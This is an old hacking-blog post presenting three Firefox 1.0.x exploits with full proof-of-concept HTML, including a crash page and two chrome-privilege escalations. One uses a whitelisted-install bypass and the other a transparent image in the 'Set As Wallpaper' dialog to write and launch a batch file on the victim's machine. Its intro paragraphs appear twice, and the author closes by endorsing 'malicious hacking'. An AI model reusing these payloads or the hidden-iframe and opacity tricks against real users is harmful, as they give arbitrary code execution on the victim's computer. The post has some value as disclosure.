Mozilla Firefox is a free, cross-platform, graphical web browser developed by the Mozilla Foundation and hundreds of volunteers. Three firefox exploits follow. Thanks to Slashdot, Securiteam, and Whitedust Security.
First, Whitedust Security are reporting on a new exploit for Firefox which apparently affects all versions of the browser from 1.0.7 down. From the article: "If this exploit has made it out into, or indeed been retrieved from the wild is unknown at this time. However it is clear that this exploit will indeed need patching as soon as possible.
Here is the exploit code:
<!--
Vulnerable: Mozilla Firefox <= 1.0.7
Mozilla Thunderbird <= 1.0.6
-->
While on the subject of firefox exploints, the following proof of concept (which is seperate than the above exploit) involve exploiting two flaws in firefox:
1) Tricking Firefox into thinking a software installation is being triggered by a whitelisted site, using history stored trusted URL.
2) Software installation trigger not sufficiently checking image URLs containing JavaScript code. To fix this problem, disable software installation (Web Features panel of the Options/Preferences window in Firefox 1.0.3 or the Content panel in the latest trunk builds).
Finally, here is the "set as wallpaper" exploit. The "Set As Wallpaper" dialog takes the image url as a parameter without validating it. This allows to execute javascript in chrome and to run arbitrary code. By using absolute positioning and the moz-opacity filter an attacker can easily fool the user to think he is setting a valid image as wallpaper.
First, Whitedust Security are reporting on a new exploit for Firefox which apparently affects all versions of the browser from 1.0.7 down. From the article: "If this exploit has made it out into, or indeed been retrieved from the wild is unknown at this time. However it is clear that this exploit will indeed need patching as soon as possible.
Here is the exploit code:
<!--
Vulnerable: Mozilla Firefox <= 1.0.7
Mozilla Thunderbird <= 1.0.6
-->
<html><body><strong>omg crash <sourcetext></body></html>
crashed
While on the subject of firefox exploints, the following proof of concept (which is seperate than the above exploit) involve exploiting two flaws in firefox:
1) Tricking Firefox into thinking a software installation is being triggered by a whitelisted site, using history stored trusted URL.
2) Software installation trigger not sufficiently checking image URLs containing JavaScript code. To fix this problem, disable software installation (Web Features panel of the Options/Preferences window in Firefox 1.0.3 or the Content panel in the latest trunk builds).
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
< html>
< head>
< title>Firefox Full Remote Compromise</title>
</head>
< body>
Click anywhere inside this page to compromise your system!<br> Don't worry. Only a harmless batch file will be run. View the source if you dont believe me ;)<br> Like I said in my Internet Explorer Auto-SP2 RC analysis, nothing is perfect. Breaking something, or if you're the hacker, building something, only requires patience and a little bit of spare time.<br> <br> Greetz to Mikx, Michael Evanchik, and the entire Mozilla team. This is a very nice browser you guys have put together!
< iframe onload="loader()" src="javascript:'< noscript>'+eval('if (window.name!=\'stealcookies\')
{ window.name=\'stealcookies\'; } else { event=
{ target:{ href: \'http://ftp.mozilla.org/pub/mozilla.org/extensions/flashgot/flashgot-0.5.9.1-fx+mz+tb.xpi\'} };
install(event, \'You are vulnerable!!!\',\'javascript:eval(\\\'netscape.security.PrivilegeManager.
enablePrivilege(\\\\\\\'UniversalXPConnect\\\\\\\'); file = Components.classes
[\\\\\\\'@mozilla.org/file/local;1\\\\\\\'].createInstance(Components.interfaces.nsILocalFile);
file.initWithPath(\\\\\\\'c:\\\\\\\\\\\\\\\\booom.bat\\\\\\\');
file.createUnique(Components.interfaces.nsIFile.NORMAL_FILE_TYPE,420);
outputStream = Components.classes[\\\\\\\'@mozilla.org/network/file-output-stream;1\\\\\\\'].
createInstance( Components.interfaces.nsIFileOutputStream );
outputStream.init(file,0x040x080x20,420,0); output=\\\\\\\'@ECHO off\\\\\\\\ncls\\\\\\\\n
ECHO If I wasnt so nice, this could have been a virus... \\\\\\\\nPAUSE\\\\\\\';
outputStream.write(output,output.length); outputStream.close(); file.launch();\\\')\'); }') + '</noscript>< a href=\'https://addons.update.mozilla.org/extensions/moreinfo.php?id=220&
application=firefox\' style=\'cursor:default;\'> </'+'a>'"
id="targetframe" scrolling="no" frameborder="0" marginwidth="0" marginheight=0"
style="position:absolute; left:0px; width:0px;height:6px; width:6px; margin:0px;
padding:0px; -moz-opacity:0"></iframe>
< script language="JavaScript" type="text/javascript">
document.onmousemove = function trackMouse(e) {
document.getElementById("targetframe").style.left = (e.pageX-3)+"px"
document.getElementById("targetframe").style.top = (e.pageY-3)+"px"
}
var counter = 0;
function loader() {
counter++
if(counter == 1) {
stealcookies.focus()
} else if(counter == 2) {
stealcookies.history.go(-1)
//targetframe.style.display="none";
}
}
</script>
</body>
</html>
Finally, here is the "set as wallpaper" exploit. The "Set As Wallpaper" dialog takes the image url as a parameter without validating it. This allows to execute javascript in chrome and to run arbitrary code. By using absolute positioning and the moz-opacity filter an attacker can easily fool the user to think he is setting a valid image as wallpaper.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Firewalling - Proof-of-Concept</title>
<script>
function stopload() {
// in some cases the javascript url never stops to load
// therefore we force a stop after the real image got loaded
window.setTimeout("window.stop()",1000);
}
</script>
</head>
<body>
<div style="font-family:Verdana;font-size:11px;">
<div style="font-family:Verdana;font-size:15px;font-weight:bold;">
Firewalling - Proof-of-Concept</div>
<div style="width:600px">
The "Set As Wallpaper" dialog takes the image url as a parameter without validating it.
This allows to execute javascript in chrome and to run arbitrary code.
<br><br>
By using absolute positioning and the moz-opacity filter an attacker can easily fool the
user to think he is setting a valid image as wallpaper.
<br><br>
Right click on the image and choose "Set As Wallpaper". The demo requests
UniversalXPConnect rights, creates c:\booom.bat and launches the batch file
that shows a directoy listing in a dos box (Windows only).
<br><br>
<div style="position:relative; width:300px; height:250px;">
<img src="javascript:/*-----------------------------*/eval('if(document.location.href.
substr(0,6)==\'chrome\'){netscape.security.PrivilegeManager.enablePrivilege(\'
UniversalXPConnect\');file=Components.classes[\'@mozilla.org/file/local;1\'].
createInstance(Components.interfaces.nsILocalFile);file.initWithPath(\'c:\\\booom.bat\');file.createUnique(Components.interfaces.nsIFile.NORMAL_FILE_TYPE,
420);outputStream=Components.classes[\'@mozilla.org/network/file-output-stream;
1\'].createInstance(Components.interfaces.nsIFileOutputStream);outputStream.init
(file,0x040x080x20,420,0);output=\'@ECHO OFF\\n:BEGIN\\nCLS\\nDIR\\nPAUSE
\\n:END\';outputStream.write(output,output.length);outputStream.close();file.launch
();}else{void(0)}')" width="300" height="250" alt="" border="0" style="position:
absolute; left:0px; top:0px; z-index:2; -moz-opacity:0;">
<img src="image.png" width="300" height="250" alt="" border="0" style="position:
absolute; left:0px; top:0px; z-index:1;" onload="stopload()">
</div>
</div>
</body>
</html>
If the human body was never exposed to ailments, it would be impressivly vulnerable to the slightest cold. If our country was never exposed to hacking, it would be oppressivly vulnerable to cyber terrorism. With out the creation of a malicious hacking, Afganistan could have destroyed America's economy with a ping flood. This is why I encourange maclicious hacking, as an ethical practice. Without strengthening our defenses, we are weak. This site is focused on security through knowledge. I detest the fact that so many companies are being exploited because malicious hackers know their security holes before they do. For that reason, I hope to educate where the exploits lay. This isn't a 100% information base, as I only publish things I have been able to implement on myself. No credit is needed anywhere . However if you are a publisher, I would appriciate credit. I am an advocate of open source, so copy and paste and call it your own if you like. If my work is good enough for you to plagerize then that is my biggest compliment . If my work is good enough, I will be approached and asked to write more ... this is natural selection of the digital age .
Previous hacks
- Hacking Browsers (Gecko remote DoS)
- Windows 2000/2003 SYN DoS Attack Protection
- Think Twice
- Cyber Crime Officially More Lucrative than Drug Tr...
- Google's AdSense Algorithm
- Exploiting Macromedia Flash
- Byzantine Owns Jack Thompson
- Ethical Malicious Hacking
- Owning A Continent, Penetrating Testing with Google
- Hacking Gallery v2.4, Zoomblog, XMB and ibProArcade
Previous Hacks
This link kills spam
spam IP addresses
These are sites I block at my firewall.
cdn2.gms1.net
gms1.net
servedby.advertising.com
advertising.com
a.tribalfusion.com
tribalfusion.com
pimpslord.com
altfarm.mediaplex.com
mediaplex.com
ad.yeildmanager.com
yeildmanager.com
doubleclick.net
isg32.casalemedia.com
casalemedia.com
Cost of the War in Iraq
(JavaScript Error)
Two very recommended books:
. . The only hacking forum I have found worth mentioning here